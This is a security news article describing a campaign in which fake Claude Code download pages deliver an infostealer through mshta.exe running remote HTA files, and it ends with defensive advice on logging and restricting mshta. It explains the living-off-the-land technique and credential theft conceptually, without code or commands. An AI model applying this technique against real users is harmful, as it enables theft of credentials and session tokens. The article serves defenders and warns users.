Cybercriminals are leveraging fake download pages impersonating the AI coding assistant Claude Code to distribute infostealer malware. This tactic exploits the growing trust in AI tools among developers and IT professionals, tricking them into downloading malicious files disguised as legitimate software. The campaign was observed using .com as a delivery domain, with carefully crafted fake download portals designed to mimic official sites, leading unsuspecting users to deploy malware.
The cybersecurity analyst Maurice Fielenbach identified the campaign, noting its sophisticated use of a legitimate Microsoft binary, mshta.exe, to execute an infostealer. This method, known as “Living off the Land,” allows attackers to run malicious code directly from remote sources without dropping traditional executable files on a victim’s system, significantly reducing detection. The trend highlights a broader issue where threat actors exploit the popularity and perceived trustworthiness of AI platforms to conduct their operations.
MSHTA-Based Execution and LOLBin Abuse Targets Developers with Fake Claude Code Downloads
The proliferation of AI-assisted coding platforms has created a fertile ground for cyber threats. As more developers integrate these tools into their workflows, they become potential targets for sophisticated phishing and malware campaigns. The use of Claude Code, a legitimate and widely adopted AI coding assistant, as bait in this instance is a clear indicator of this evolving threat landscape. Attackers aim to bypass the general security awareness of users by impersonating trusted software.
The attack chain begins when a user visits a deceptive website mimicking an official Claude Code download portal. These pages are designed to appear entirely legitimate, offering buttons that, when clicked, initiate the download of a file. However, this file is not the intended software. Instead, it triggers a malicious execution process that silently installs an infostealer onto the victim’s computer. The conviction displayed by these fake pages makes it difficult for users to discern the genuine from the malicious.
Fielenbach emphasized that mshta.exe, a signed Microsoft Windows binary, continues to be a critical process for security defenders to monitor. Attackers frequently abuse this legitimate tool to execute malicious HTML Application (HTA) files fetched directly from remote servers. This “Living off the Land” technique, cataloged under MITRE ATT&CK as T1218.005, allows malware to operate stealthily, often evading standard antivirus detection. The execution of HTA files from remote sources using mshta.exe serves as a high-signal indicator of malicious activity.
The broader implications of this campaign are significant for individuals and organizations alike. The infostealer is designed to harvest sensitive data, including browser credentials, session tokens, and other confidential information, which is then exfiltrated to attacker-controlled infrastructure. For developers, the primary targets, compromised credentials can provide access to valuable intellectual property such as code repositories, cloud environments, and internal company systems. This can escalate into widespread organizational security breaches, causing substantial financial and reputational damage.
The infection mechanism relies heavily on the abuse of mshta.exe, a trusted component of the Windows operating system. Because it is a native binary, its execution is often overlooked by security software that may not flag its activity by default, keeping its operation relatively low-profile. This “Living off the Land” abuse is particularly effective because it avoids introducing new, unknown executables to the system. The payload is executed entirely within memory, making forensic analysis after an attack considerably more challenging.
When a user falls victim to a fake Claude Code download page, mshta.exe is invoked to fetch and execute a remote HTA file. This HTA file contains embedded malicious scripts that perform the infostealer’s core functions. The process of collecting credentials, browser data, and other sensitive information happens entirely in memory, leaving minimal traces on the victim’s hard drive. The absence of a traditional executable file installation further complicates the detection and recovery efforts for incident response teams.
Security teams are strongly urged to implement enhanced logging for all mshta.exe activity across their endpoints. Special attention should be paid to any instances where mshta.exe connects to external URLs, as this is a key indicator of potential compromise. Where operationally feasible, organizations should also consider using application control policies to restrict the execution of mshta.exe, especially from untrusted sources. End-users are advised to exercise extreme caution and always verify software downloads directly from official vendor websites, avoiding third-party or unfamiliar sources regardless of how legitimate they may appear.